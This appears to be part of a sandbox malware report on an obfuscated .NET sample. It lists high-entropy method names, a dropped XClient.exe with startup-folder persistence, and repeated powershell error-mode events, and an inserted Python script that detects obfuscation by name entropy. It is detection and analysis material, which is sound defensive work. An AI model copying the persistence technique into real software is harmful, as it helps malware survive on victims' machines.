              Source: 0.2.THITWNSEI24112908089786756456545346568789-00010.scr.exe.425e1f0.6.raw.unpack, aLE6e0yUoaPuqaXnZp.csHigh entropy of concatenated method names: 'lU83koOENm', 'G0d37MAwH2', 'xvl336BAp9', 'zIu3gxxhrc', 'ODQ3j69pTp', 'pqY3Y1v5Bx', 'Dispose', 'qiD4ED7MKE', 'TxJ48k9sBO', 'QMX4FGXxLg'
              Source: 0.2.THITWNSEI24112908089786756456545346568789-00010.scr.exe.425e1f0.6.raw.unpack, TyDfo1bY3ZrsEhlwFm.csHigh entropy of concatenated method names: 'LEQ61Yhn0P', 'CM26Bd0vqB', 'x4L6viRvxg', 'gpe6dJ0JYg', 'c7A6krMkvu', 'vu66saxiV8', 'awPQbno2xCjjuEUKWs', 'PQ7Q6KOsvX2psFAINI', 'snp66h2MSF', 'gAj6SFpTdn'
              Source: 0.2.THITWNSEI24112908089786756456545346568789-00010.scr.exe.425e1f0.6.raw.unpack, XJYgVjwL3PMpoS7ArM.csHigh entropy of concatenated method names: 'DngHiIeN65', 'avbHGrDEIl', 'MRwFNkOx5E', 'ileFhuRStQ', 'fDUFqfvROq', 'qxGFOJJKsC', 'dOUF22qm4Q', 'gyFFVbIDdG', 'ls6FMfRcZx', 'rIAFl2xQM4'
              Source: 0.2.THITWNSEI24112908089786756456545346568789-00010.scr.exe.425e1f0.6.raw.unpack, gfpQDs6aGwak9n0C4Oi.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'ftyWfKZ3sv', 'YyKWoens9f', 'JqSWn4aldt', 'YsuWtZ2tR7', 'U7PWRRH0Br', 'nniWc55UHK', 'e6DWXCF90H'
              Source: 0.2.THITWNSEI24112908089786756456545346568789-00010.scr.exe.425e1f0.6.raw.unpack, PyUexM6byOoMxTLOSna.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'DETI3YPc2N', 'hs8IW3uoER', 'XChIgSciVH', 'UEOIIUa0I4', 'bj9Ij5tbNa', 'k2jIJhbn5Y', 'QFEIYiZMTs'
              Source: 0.2.THITWNSEI24112908089786756456545346568789-00010.scr.exe.420b7d0.5.raw.unpack, Udui5apYySouKBMT14.csHigh entropy of concatenated method names: 'Af1PYkPV6', 'PR4ufbV2o', 'Na8eggfVB', 'tccGmNNn0', 'Nc7U4t7ix', 'tMVwLEZKQ', 'oYfmOweGWPW0OMjSpl', 'iyUc388o7EydOdRx0F', 'wKm4rI2Eo', 'HNTWlaN5G'
              Source: 0.2.THITWNSEI24112908089786756456545346568789-00010.scr.exe.420b7d0.5.raw.unpack, ka7sYHFqq7dPvT5nVb.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'gBvp0IHps2', 'koop5whEy3', 'i4upz0fhfI', 'gN0SaF6xyS', 'JsaS6EMuqE', 'LkvSprNFgW', 'PXKSSktkcR', 'cD7SiRsLfYtbOl2FpPc'
              Source: 0.2.THITWNSEI24112908089786756456545346568789-00010.scr.exe.420b7d0.5.raw.unpack, ADkFnNn5Tlm0QIaDOi.csHigh entropy of concatenated method names: 'hgoCmPpjRZ', 'dDZCUmYFEj', 'WL1CDZDgrS', 'dfRCZ0X1mJ', 'JBqChoVK5L', 'eXXCqbR7ed', 'vtbC2g5Psq', 'DNpCVx0IxH', 'S1PCljQANs', 'vhuCfdWH72'
              Source: 0.2.THITWNSEI24112908089786756456545346568789-00010.scr.exe.420b7d0.5.raw.unpack, DjlwRxU4LiRvxgFpeJ.csHigh entropy of concatenated method names: 'pCHFuVEjIZ', 'xnmFeuCUkC', 'ek2Fmj00MP', 'UocFURHFt2', 't3OFkwu1tm', 'BmJFssUOfJ', 'NtVF7gqnt8', 'YZdF4uv1Pd', 'Ms7F3II7fa', 'et7FWFVdsM'
              Source: 0.2.THITWNSEI24112908089786756456545346568789-00010.scr.exe.420b7d0.5.raw.unpack, XYhn0PmGM2d0vqBguD.csHigh entropy of concatenated method names: 'JtQ8txXQtR', 'MkX8RcxJUE', 'x0Z8cIuZYI', 'yt88XWNABE', 'X3F8LfmjfE', 'JIT8rT6wVS', 'DGE8y2uHYV', 'Ipb8QuLZQD', 'L8Q80gj6rM', 'A8785oPllC'
              Source: 0.2.THITWNSEI24112908089786756456545346568789-00010.scr.exe.420b7d0.5.raw.unpack, ovuju6DaxiV8v3NgFP.csHigh entropy of concatenated method names: 'uyLAKTa90H', 'URuA8ygFvI', 'AJCAHYRQJe', 'i8fA1T3ijb', 'zK7AB23JuV', 'TcvHLQitbn', 'txCHrBsHuh', 'BYJHylSDQ4', 'H89HQpLlVu', 'TInH0T1m66'
              Source: 0.2.THITWNSEI24112908089786756456545346568789-00010.scr.exe.420b7d0.5.raw.unpack, dnnWTVcWiOSUoMKxjl.csHigh entropy of concatenated method names: 'ToString', 'nr7sfKOZhc', 'TwDsZTlW11', 'DZYsNp51hy', 'TJCshaQDPO', 'Fj0sqbORXS', 'QBnsOIIcLO', 'HXes2yQqQd', 'VpxsVJdWTi', 'EAasMSbsYt'
              Source: 0.2.THITWNSEI24112908089786756456545346568789-00010.scr.exe.420b7d0.5.raw.unpack, bYvEAE0FmDgKllXo6e.csHigh entropy of concatenated method names: 'TOy3DY1W7g', 'UuM3ZXaJbb', 'Rk03NcH8Rw', 'wix3hMja66', 'nRj3q2bsej', 'IHD3OdBTPm', 'OCa32INt6R', 'CPA3VSwS0h', 'CTm3MLxedS', 'T0c3lobFVH'
              Source: 0.2.THITWNSEI24112908089786756456545346568789-00010.scr.exe.420b7d0.5.raw.unpack, SCIXNr23CfXNXKcjQ5.csHigh entropy of concatenated method names: 'Yd71EfZgm2', 'rrJ1FD4ysE', 'BCj1AeD92I', 'B2CA5wg6ak', 'mL2AziwQBJ', 'nA41a74gmD', 'Daa16lWfSn', 'Wci1pHeCFn', 'MOv1SjWp4v', 'roy1b1DsEt'
              Source: 0.2.THITWNSEI24112908089786756456545346568789-00010.scr.exe.420b7d0.5.raw.unpack, Ee1KgtXRbhccZ7sMGe.csHigh entropy of concatenated method names: 'Pwt7vWXGle', 'jo97d8qFRf', 'ToString', 'RLG7EeScyT', 'n0F78waNBI', 'YbH7FkR6jU', 'P8H7HeyCAC', 'c567Atw0wI', 'NX171OpfU4', 'On67BqoyTZ'
              Source: 0.2.THITWNSEI24112908089786756456545346568789-00010.scr.exe.420b7d0.5.raw.unpack, a2rhWx5dUBFm60NB8M.csHigh entropy of concatenated method names: 'JLlWFBMkRs', 'TPoWHupbbU', 'SBJWAXUX5B', 'atuW1h8XUR', 'wTcW3WppBA', 'IUDWBShMY8', 'Next', 'Next', 'Next', 'NextBytes'
              Source: 0.2.THITWNSEI24112908089786756456545346568789-00010.scr.exe.420b7d0.5.raw.unpack, Q04Ya9ByfkVda15Ypp.csHigh entropy of concatenated method names: 'w80SKpd1QE', 'TfvSEuZKlk', 'cpZS8Jo0N9', 'cUiSFgVcCC', 'NVrSH5NU0H', 'LiISAGMyp2', 'mF0S1Q1TxP', 'JaESBfGfOf', 'oWRST14Zsa', 'lc2SvByV4B'
              Source: 0.2.THITWNSEI24112908089786756456545346568789-00010.scr.exe.420b7d0.5.raw.unpack, LL5idJMlpFFnUZLDnT.csHigh entropy of concatenated method names: 'gp11xAj6Si', 'qQU19ytUvk', 'kFc1PstPKN', 'rGi1uBLR44', 'oFv1infXxG', 'FXi1eVpr7C', 'Mrf1Ge0Uvy', 'QUA1mZOXne', 't3h1U2E80v', 'zNt1wipJMb'
              Source: 0.2.THITWNSEI24112908089786756456545346568789-00010.scr.exe.420b7d0.5.raw.unpack, S74R94tKMGmNqIEyqQ.csHigh entropy of concatenated method names: 'E2TklvHnD6', 'NPSkoj5LMC', 'zXfktLShOu', 'YS2kRK8YYD', 'hrYkZ6WXlr', 'PgmkNPcdH4', 's99khyeooU', 'SYmkqZAieM', 'w3TkOhBUJV', 'PsIk2ZmsVN'
              Source: 0.2.THITWNSEI24112908089786756456545346568789-00010.scr.exe.420b7d0.5.raw.unpack, tyOgSPrRXGoq56AsYx.csHigh entropy of concatenated method names: 'Yej7QlA0E2', 'uRg75oZ2y5', 'QNN4aQDsVJ', 'M2h46V3wKe', 't0K7fhF1MS', 'TS47oE7PTJ', 'zFO7nMmpfM', 'xDg7txYso3', 'vgP7RvaWFO', 'Lch7cwRZkc'
              Source: 0.2.THITWNSEI24112908089786756456545346568789-00010.scr.exe.420b7d0.5.raw.unpack, Vw7f8p8oGS4wsJPMJo.csHigh entropy of concatenated method names: 'Dispose', 'aPu60qaXnZ', 'w7dpZe7aV1', 'nUky64iXsU', 'cMk65cckeP', 'Nwj6zF1nab', 'ProcessDialogKey', 'XZppaYvEAE', 'hmDp6gKllX', 'P6eppa2rhW'
              Source: 0.2.THITWNSEI24112908089786756456545346568789-00010.scr.exe.420b7d0.5.raw.unpack, xTGpsxZB81EqjVRX17.csHigh entropy of concatenated method names: 'EeAN11hVnuuXFa7Ot2G', 'YL7ZNWhkZTxRdPwrwNF', 'FkSA40HCZO', 'jwDA3MK0uM', 'as5AWXPAg5', 'M63C94h9imA9GPTqgpJ', 'XqJmJehIFlQXUm3WDv1'
              Source: 0.2.THITWNSEI24112908089786756456545346568789-00010.scr.exe.420b7d0.5.raw.unpack, QxUVgL66mMgmFeb54i1.csHigh entropy of concatenated method names: 'yhnW5yudus', 'bb5WzNd6io', 'BgngaPtahW', 'oQyg6GZlLB', 'alYgp4yxbV', 'oATgSpvCUT', 'nJugbEaRNp', 'oDvgK0xmSo', 'CbggEXMi0s', 'hceg8I9FgI'
              Source: 0.2.THITWNSEI24112908089786756456545346568789-00010.scr.exe.420b7d0.5.raw.unpack, jRAAR5zRlVId4oZWmj.csHigh entropy of concatenated method names: 'fGHWe22uFx', 'KxeWme0oiu', 'kZpWUJX7B1', 'oXNWDDWrjk', 'td6WZP8pNg', 'nUYWhsSnyu', 'bV0WqLt50V', 'NajWYRGiud', 'eUhWxVmoxH', 'SFWW9lmArK'
              Source: 0.2.THITWNSEI24112908089786756456545346568789-00010.scr.exe.420b7d0.5.raw.unpack, aLE6e0yUoaPuqaXnZp.csHigh entropy of concatenated method names: 'lU83koOENm', 'G0d37MAwH2', 'xvl336BAp9', 'zIu3gxxhrc', 'ODQ3j69pTp', 'pqY3Y1v5Bx', 'Dispose', 'qiD4ED7MKE', 'TxJ48k9sBO', 'QMX4FGXxLg'
              Source: 0.2.THITWNSEI24112908089786756456545346568789-00010.scr.exe.420b7d0.5.raw.unpack, TyDfo1bY3ZrsEhlwFm.csHigh entropy of concatenated method names: 'LEQ61Yhn0P', 'CM26Bd0vqB', 'x4L6viRvxg', 'gpe6dJ0JYg', 'c7A6krMkvu', 'vu66saxiV8', 'awPQbno2xCjjuEUKWs', 'PQ7Q6KOsvX2psFAINI', 'snp66h2MSF', 'gAj6SFpTdn'
              Source: 0.2.THITWNSEI24112908089786756456545346568789-00010.scr.exe.420b7d0.5.raw.unpack, XJYgVjwL3PMpoS7ArM.csHigh entropy of concatenated method names: 'DngHiIeN65', 'avbHGrDEIl', 'MRwFNkOx5E', 'ileFhuRStQ', 'fDUFqfvROq', 'qxGFOJJKsC', 'dOUF22qm4Q', 'gyFFVbIDdG', 'ls6FMfRcZx', 'rIAFl2xQM4'
              Source: 0.2.THITWNSEI24112908089786756456545346568789-00010.scr.exe.420b7d0.5.raw.unpack, gfpQDs6aGwak9n0C4Oi.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'ftyWfKZ3sv', 'YyKWoens9f', 'JqSWn4aldt', 'YsuWtZ2tR7', 'U7PWRRH0Br', 'nniWc55UHK', 'e6DWXCF90H'
              Source: 0.2.THITWNSEI24112908089786756456545346568789-00010.scr.exe.420b7d0.5.raw.unpack, PyUexM6byOoMxTLOSna.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'DETI3YPc2N', 'hs8IW3uoER', 'XChIgSciVH', 'UEOIIUa0I4', 'bj9Ij5tbNa', 'k2jIJhbn5Y', 'QFEIYiZMTs'
              Source: 0.2.THITWNSEI24112908089786756456545346568789-00010.scr.exe.307b134.0.raw.unpack, OEGyOZzp9CU9Z.csHigh entropy of concatenated method names: 'QYSru9RU5dJWd', 'oi9Msqd9lmqFp', 'Gh7hF3Ceyz4jK', 'x2Kcz0n4msm1l2xM', '_4hDI5T8H5DCOIm19', 'T6aFt50BZla82ZA2', 'zpcOiMJTAlF4Htxi', 'TMFXXcHHzUU18I1r', 'ZSkwZRotVkMfXhhu', 'Um2YTXt47I4LIxgc'
              Source: 0.2.THITWNSEI24112908089786756456545346568789-00010.scr.exe.307b134.0.raw.unpack, v5gt0V01k1MSsC0vwoxxBSwsEW4T1eqJw046P2ak3r4M2UHQ1RfEfyXqwlgDqRqjrSOTYe7.csHigh entropy of concatenated method names: 'Equals', 'GetHashCode', 'GetType', 'ToString', 'Create__Instance__', 'Dispose__Instance__', 'QTea7y2A8yGbO3jMXxuYC9YMcx5anBR', 'ZTIL5yWBKqapf9Byr2X2ov4nJgGIqjf', 'WHkIaWdsBqOvjqgK5gnz3Hq7FGRo7av', 'ksvOYOxtyeEJgsYuEk2j6FJUFQEL7jb'
              Source: 0.2.THITWNSEI24112908089786756456545346568789-00010.scr.exe.307b134.0.raw.unpack, xEwUvc4BlwXCJ.csHigh entropy of concatenated method names: 'upuCmD95kpAQn', 'y64QqzLLzgvYy', 'nHNLF6ETZc4pz', 'wFe23vyXZnI9p', 'oPyUSoKLxc3MJ', 'j0yacKOMxpzCw3ZgwzP7SYa9OQxk42U', 'sG0Gu7E9uPceY4JkCHFeLM6rppnIbSk', 'Ic69UCn21qS8jQPeUpzcxe67X8Wwo7C', 'TVdrYhGtHgnmKaKEGnnQHc1AVeCLwz9', 'h9lFeGqDok6PiuQlRtN7JIQA7sN9FeZ'
              Source: 0.2.THITWNSEI24112908089786756456545346568789-00010.scr.exe.307b134.0.raw.unpack, qMGvLJvouSdkL.csHigh entropy of concatenated method names: 'wAkM01TBZTMeC', 'ciAT4tkkLZ8RM', 'kyv1OiOaRjUOS', 'Is1Vu2C8gzfuWAcZ', 'ZrXVwJq1NPBYst66', 'YSiZ9OqRAn5DEoap', 'kpqsU8I4EmsXem6T', 'Y40LWH71GiExNonP', 'wlqe8L0mqhORb3Xh', 'cBzGfHA7YZurGUjI'
              Source: 0.2.THITWNSEI24112908089786756456545346568789-00010.scr.exe.307b134.0.raw.unpack, 3QiiXqkghrMk1.csHigh entropy of concatenated method names: '_7TDRTDNWODVx9', 'bjpklCnAU25Ps', '_7whWzOffgktu7', 'H6OjpWJSuZpR7', 'LgXlVehbtF6PL', 'VPnNUxfUUOfKi', 'kVcqKyJkqeEYF', 'I9f9xqzndWbJy', 'Yh4ih3UMSubwZ', '_99oZuJy83I8YX'
              Source: 0.2.THITWNSEI24112908089786756456545346568789-00010.scr.exe.307b134.0.raw.unpack, y42W1bnvO6P0K.csHigh entropy of concatenated method names: 'LG61tF1NXxMw5', 'oGvBieVy94qbk', 'YRTDDNA0tkzMF', 'VhxySITiopS46', 'qjbfovDtQWz1b', 'kLPAgXYZstRMB', 'hjXpfk41rTAw1', 'zs2SZYN7C9FhZ', 'zFQIATYwwABMt', 'qai42JONF5klU'
              Source: 0.2.THITWNSEI24112908089786756456545346568789-00010.scr.exe.307b134.0.raw.unpack, 4QBfyOitSe4w0.csHigh entropy of concatenated method names: 'wcUZ2mvylwf7l', 'WtIrNy0hVmv60', 'JJgHyUlgPqlHQ', 'oHuREPEY4JElU', '_6vBzT4Nf8lYoy', 'Pai19egUGSisn', 'R5KRLNkgechqT', 'BCrPs0JGWRM5b', 'aoGqSGI44Uvct', 'irOTow0Wq5kJo'
              Source: 0.2.THITWNSEI24112908089786756456545346568789-00010.scr.exe.307b134.0.raw.unpack, yI26puFLQ4OeW.csHigh entropy of concatenated method names: 'RPwrCFQWFVe3z', 'ykPv5m8mGukHt', 'rl3v1HQ21t3Ss', 'p5lTD1bRQsSns', 'N73EDMwGLrsYV', '_7giKgaxCmtum3', 'zR4TMA5bTqEsF', 'lNVI49QJGetLk', 'ivrYT9hUulqbg', 'G1GjbMsl7I84P'
Source: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exe | File created: C:\Users\user\AppData\Roaming\XClient.exe (dropped file)
Source: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XClient.lnk (2 events)
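The entropy heuristic behind the "High entropy of concatenated method names" signatures listed above, as an added example that is not part of the Joe Sandbox report. Symbol-renaming obfuscators replace readable .NET identifiers with random alphanumerics, so the Shannon entropy of a class's concatenated method names approaches the maximum for a mixed-case alphanumeric alphabet (log2(62), about 5.95 bits per character), while hand-written camelCase names are repetitive and score well below that. The ten names in REPORT_LINE are copied from the xEwUvc4BlwXCJ.cs entry above; the flagging threshold of 5.0 bits per character and the benign comparison set are assumptions for illustration, not Joe Sandbox's own values.

```python
"""Entropy heuristic for obfuscated .NET method names (added example)."""
import math
import re
from collections import Counter

# Assumed flagging threshold, in bits per character (not the sandbox's value).
ENTROPY_THRESHOLD = 5.0

# A signature line in the shape used by the report; the class file and the
# ten method names are copied from the xEwUvc4BlwXCJ.cs entry of this report.
# The page text may run the ".cs" name and the signature text together.
REPORT_LINE = (
    "Source: 0.2.THITWNSEI24112908089786756456545346568789-00010.scr.exe"
    ".307b134.0.raw.unpack, xEwUvc4BlwXCJ.cs"
    "High entropy of concatenated method names: 'upuCmD95kpAQn', "
    "'y64QqzLLzgvYy', 'nHNLF6ETZc4pz', 'wFe23vyXZnI9p', 'oPyUSoKLxc3MJ', "
    "'j0yacKOMxpzCw3ZgwzP7SYa9OQxk42U', 'sG0Gu7E9uPceY4JkCHFeLM6rppnIbSk', "
    "'Ic69UCn21qS8jQPeUpzcxe67X8Wwo7C', 'TVdrYhGtHgnmKaKEGnnQHc1AVeCLwz9', "
    "'h9lFeGqDok6PiuQlRtN7JIQA7sN9FeZ'"
)

# Constructed benign comparison set: ordinary names from a hand-written class.
BENIGN_NAMES = [
    "GetValue", "SetValue", "ToString", "Equals", "GetHashCode",
    "Dispose", "Initialize", "ReadBytes", "WriteBytes", "Close",
]

# Tolerates any non-word separator (none, a space, " | ") between ".cs" and
# the signature text.
_LINE_RE = re.compile(
    r"(?P<cls>\S+\.cs)\W*High entropy of concatenated method names:\s*(?P<names>.*)$"
)


def shannon_entropy(text: str) -> float:
    """Shannon entropy of a string in bits per character (0.0 for empty)."""
    if not text:
        return 0.0
    n = len(text)
    return -sum(c / n * math.log2(c / n) for c in Counter(text).values())


def normalize(name: str) -> str:
    """Drop the leading underscore a decompiler prepends to names that begin
    with a digit (not a valid C# identifier); the IL name has no underscore."""
    return name.lstrip("_")


def method_name_entropy(names) -> float:
    """Entropy of all method names of one class joined into a single string."""
    return shannon_entropy("".join(normalize(n) for n in names))


def looks_obfuscated(names, threshold: float = ENTROPY_THRESHOLD) -> bool:
    """True when the concatenated names are at or above the assumed threshold."""
    return method_name_entropy(names) >= threshold


def parse_signature_line(line: str):
    """Extract (class file, [method names]) from one report signature line."""
    m = _LINE_RE.search(line)
    if not m:
        raise ValueError("not a method-name entropy signature line")
    return m.group("cls"), re.findall(r"'([^']+)'", m.group("names"))


if __name__ == "__main__":
    cls, names = parse_signature_line(REPORT_LINE)
    for label, ns in ((cls, names), ("benign", BENIGN_NAMES)):
        print(f"{label}: {method_name_entropy(ns):.2f} bits/char, "
              f"obfuscated={looks_obfuscated(ns)}")
```

The measurement is per class, over the concatenation rather than per name, because a single short random name has too few characters for a stable estimate. Leading underscores are stripped because decompilers add them to IL names that start with a digit (such as `_7TDRTDNWODVx9` above); the underscore is not part of the name the obfuscator generated.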

              Hooking and other Techniques for Hiding and Protection

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 (16 events)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 (12 events)
Source: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exe | Process information set: NOOPENFILEERRORBOX (87 events)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX (104 events)
Note: NOOPENFILEERRORBOX is the SEM_NOOPENFILEERRORBOX flag of SetErrorMode, which suppresses the dialog Windows would otherwise display when a file (typically a DLL being probed) cannot be found; the powershell.exe instances show the same behaviour at a similar rate, so on its own this signature is weak evidence of evasion.
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
